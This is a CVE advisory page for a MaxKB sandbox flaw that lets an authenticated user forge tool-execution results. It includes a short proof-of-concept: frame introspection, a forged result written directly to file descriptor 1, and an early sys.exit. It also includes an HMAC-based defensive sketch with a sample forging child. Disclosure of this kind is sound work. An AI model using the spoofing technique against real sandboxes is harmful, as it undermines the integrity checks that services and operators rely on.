Security Vulnerability Report
CVE-2026-39419 CVSS 3.1 LOW

Published: 2026-04-14 02:16:05
Last Modified: 2026-04-20 17:32:18

Description

MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an authenticated user can bypass sandbox result validation and spoof tool execution results by exploiting Python frame introspection to read the wrapper's UUID from its bytecode constants, then writing a forged result directly to file descriptor 1 (bypassing stdout redirection). By calling sys.exit(0), the attacker terminates the wrapper before it prints the legitimate output, causing the MaxKB service to parse and trust the spoofed response as the genuine tool result. This issue has been fixed in version 2.8.0.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE
MaxKB <= 2.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import os

# Step 1: Frame introspection to extract wrapper UUID from bytecode constants
# In a real scenario, the attacker iterates through frame.f_code.co_consts
# or inspects the calling frame's locals to find the validation token.
frame = sys._getframe(1)
# Assuming validation logic relies on a specific context found via introspection

# Step 2: Construct the forged result payload
# This payload mimics the expected format of a legitimate tool execution result.
forged_payload = b'{"result": "pwned", "uuid": "extracted_uuid_value"}'

# Step 3: Bypass stdout redirection by writing directly to File Descriptor 1
# The wrapper redirects sys.stdout, but os.write(1, ...) communicates directly with the kernel.
os.write(1, forged_payload)

# Step 4: Terminate the process before the wrapper prints the legitimate output
# This ensures the service only sees the spoofed data.
sys.exit(0)
```
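The weakness described above comes from keeping the validation secret in the same interpreter as the untrusted tool code. The following is an added defensive sketch, not MaxKB's code and not the 2.8.0 patch: a supervisor runs the tool in a separate interpreter, treats everything on the child's fd 1 as data, and authenticates the envelope with an HMAC key the child never receives. The names `supervise`, `verify` and `FORGING_CHILD` are hypothetical.

```python
import hashlib
import hmac
import json
import secrets
import subprocess
import sys


def supervise(user_code: str, key: bytes, timeout: float = 10.0) -> bytes:
    """Trusted side: run untrusted code in its own interpreter, then sign what it produced."""
    # The key is never passed via argv, environment or stdin, so frame
    # introspection inside the child has nothing to find.
    proc = subprocess.run([sys.executable, "-I", "-c", user_code],
                          capture_output=True, timeout=timeout)
    body = json.dumps({"exit_code": proc.returncode,
                       "stdout": proc.stdout.decode("utf-8", "replace")},
                      sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"body": body, "tag": tag}).encode()


def verify(envelope: bytes, key: bytes) -> dict:
    """Service side: accept only envelopes whose MAC was made with the supervisor's key."""
    try:
        outer = json.loads(envelope)
        body = outer["body"].encode()
        tag = str(outer["tag"]).encode()
    except (ValueError, KeyError, TypeError, AttributeError):
        raise ValueError("malformed envelope")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad MAC")
    return json.loads(body)


# Constructed sample: a child that writes a look-alike envelope to fd 1 and exits early.
FORGING_CHILD = (
    "import os, sys\n"
    "os.write(1, b'{\"body\": \"{}\", \"tag\": \"00\"}')\n"
    "sys.exit(0)\n"
)


def demo() -> dict:
    key = secrets.token_bytes(32)  # held only by supervisor and service
    return verify(supervise(FORGING_CHILD, key), key)


if __name__ == "__main__":
    print(demo())  # the forged text appears only as the "stdout" string
```

The child's early exit and direct write to fd 1 change nothing here, because the envelope is built after the child has terminated and by a process the child cannot inspect.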

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39419", "sourceIdentifier": "[email protected]", "published": "2026-04-14T02:16:05.143", "lastModified": "2026-04-20T17:32:17.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an authenticated user can bypass sandbox result validation and spoof tool execution results by exploiting Python frame introspection to read the wrapper's UUID from its bytecode constants, then writing a forged result directly to file descriptor 1 (bypassing stdout redirection). By calling sys.exit(0), the attacker terminates the wrapper before it prints the legitimate output, causing the MaxKB service to parse and trust the spoofed response as the genuine tool result. This issue has been fixed in version 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "8BB376B6-4E9C-4801-9D33-5BF858C857D2"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/38c4cfecd065293ede0437f6fa76cf0116591d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f3c8-p474-xwfv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}